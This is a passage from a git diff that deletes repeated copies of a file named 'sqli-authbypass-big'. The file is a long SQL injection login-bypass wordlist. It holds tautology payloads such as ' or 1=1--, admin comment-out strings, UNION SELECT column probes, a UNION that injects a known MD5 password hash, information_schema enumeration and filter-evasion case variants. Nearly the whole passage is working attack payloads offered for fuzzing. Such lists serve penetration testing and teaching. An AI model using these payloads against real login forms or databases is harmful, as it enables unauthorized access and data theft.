-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
